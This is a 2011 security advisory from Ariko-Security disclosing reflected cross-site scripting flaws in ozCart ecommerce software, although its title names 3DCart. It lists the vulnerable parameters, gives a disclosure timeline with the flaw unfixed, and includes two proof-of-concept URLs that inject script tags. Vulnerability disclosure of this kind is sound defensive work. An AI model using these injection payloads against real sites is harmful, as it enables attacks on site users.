3DCart Shopping Cart Software multiple XSS vulnerabilities

# Ariko-Security: Security Audits , Audyt bezpieczeństwa
# Advisory: 2/2011

============ { Ariko-Security - Advisory #2/1/2011 } =============

ozCart software multiple XSS vulnerabilities

Vendor's description of software and demo:
# http://www.oscworks.com.au , http://www.ozcart.com.au/

Dork:
# N/a

Application Info:
# ozCart ecommerce software
# last v2.0

Vulnerability Info:
# Type: XSS

Time Table:
# 21/12/2010 - Vendor notified
# 06/01/2011 - Release Date. (not fixed)

XSS:
#Input passed to the "addressname" parameter in addressaction.html is not properly sanitised before being returned to the user.
#Input passed to the "pID" and "currency" parameters in addressaction.html is not properly sanitised before being returned to the user.

Sample POC:
#http://server/index.php?main_page=popup_image&pID=148"><sCrIpT>alert(14438)</sCrIpT>
http://server/index.php?main_page=index.php&currency= NZD"><sCrIpT>alert(11585)</sCrIpT>&cPath=100

Solution:
# Input validation of vulnerable parameters should be corrected.

Credit:
# Discoverd By: Ariko-Security 2010